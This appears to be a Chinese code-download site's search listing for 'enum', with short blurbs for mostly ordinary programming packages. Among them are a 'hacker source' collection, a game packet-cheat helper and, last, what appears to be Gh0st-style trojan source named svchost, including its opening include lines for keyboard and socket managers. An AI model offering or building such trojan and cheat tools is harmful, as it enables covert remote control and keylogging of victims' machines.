搜索资源列表
hacker_source
- 黑客最新源码集 包含 Delphi_Hacker_Demos --Copyownapp.zip --DelDir.zip --CopyFile.zip --EnumInterfaces.zip --IEGetCache.zip .... 等最新黑客源码。-source hackers latest collection includes Delphi_Hacker_Demos -- Copyow napp.zip -- DelDir. zip -- CopyF
canf18xx8.h
- 、 先在microchip网站上找到00738.zip,这个包中有 can18xx8.h,can18xx8.c,将其复制到一个你要编写程度的子目录中,例如C:\testcan下,这个时候这个东东是不能直接用的。 2、 下载一个MPLAB 7.10,直接安装(要求直接下载) 3、 再下载一个PICC18 (HI-TECH的),要正版哦(支持正版,买不起的想其它办法吧) 4、在你的头文件上写上如下的样式: #include "stdio.h"
pl/0
- /*PL/0编译系统C版本头文件pl0.h*/ /* typedef enum { false, true } bool; */ #define norw 13 /*关键字个数*/ #define txmax 100 /*名字表容量*/ #define nmax 14 /*number的最大位数*/ #define al 10
AdmobEnum
- 本代码演示了多个admob广告,将其放在enum下,同时取多个admob广告,看其特点。-This code demonstrates a number of admob advertising, put it in the next enum, while taking multiple admob ads, look at its characteristics.
Delphi-USB
- This package is for people who want to develop USB applications with Borland Delphi.
EnumWindowUtil
- enum bring down look tthat
Enum-Process-for-MASM
- code for all processes running at the time API uses native (NtQuerySystemInformation) compiled with MASM the code is for 32 bytes can be changed to 64 bytes:)
enum-rtti-delphi
- Enumeration of pre-defined types
O5
- 1,定义一个类Card,该类的对象代表一张扑克牌。要求包含三个属性:点数,花色,和大小王信息(三者均为enum类型)。要求扑克牌能比较大小,比较规则为: a,大王最大,小王其次。 b,其他的扑克牌按点数大小来比,点数相同的按花色来比(花色从大到小的顺序是:黑桃>红桃>梅花>方块)。 2,为Card类写一个静态方法: static TreeSet[] dispatch(int players,int reservers),要求用一副扑克牌随机的为多人发牌,并预留给
test
- 1) 定义一个CPU类,包含等级(Rank)、频率(frequency)、电压(voltage)等属性,有两个公有成员函数run、stop。其中,rank为枚举类型CPU__Rank,定义为enum CPU_Rank{P1=1,P2,P3,P4,P5,P6,P7},frequency为单位是MHz的整型数,voltage为浮点型的电压值。观察构造函数和析构函数的调用顺序。 2) 定义一个简单的Computer类,有数据成员芯片(cpu)、内存(ram)、光驱(cdrom)等等,有两个公有成员
EnumfromStringLV8.6
- enum from string conversion labview
scan
- //程序实现C语言词法分析器的设计 //用到的变量 // cch 放当前字符 // q 标志保留字(1:是 0:否) //StrToken 保留字列表 /*C语言中的保留字(32个) auto break case char const continue default do double else enum extern float for goto if int long register retu
Packet-transmission-source
- 利用枚举套接字 实现封包发送。。。。。是做封包挂的朋友么得好帮手哦-Packet source to use the enum socket implementation sends packets sent. . . . . Friends are doing it well hang packet helper oh
enum
- 很精简的词法分析器! 然后写了个 DEMO -hao dong xi kuai lai xia zai la!
Delphi_072143
- Delphi:Delphi枚举网络,通过Enum枚举的方法列出网络中的NETWare Server,程序获取时候速度有点慢,如果设置不对,程序会假死,源代码还有再扩展的空间,觉得有用的就下载源码吧。 -Delphi: Delphi enumerate network, listed by network NETWare Server Enum enumeration methods, procedures, time to get a bit slow, if not set, the pr
6
- C语言使用枚举输出一周中的每一天,用枚举简单实现。-C language enum output for each day of the week, to achieve a simple enumeration.
svchost
- ghost小马源码,喜欢的可以拿去研究。-// svchost.cpp : Defines the entry point for the console application. // #pragma comment(linker, /OPT:NOWIN98 ) #include ClientSocket.h #include common/KernelManager.h #include common/KeyboardManager.h #incl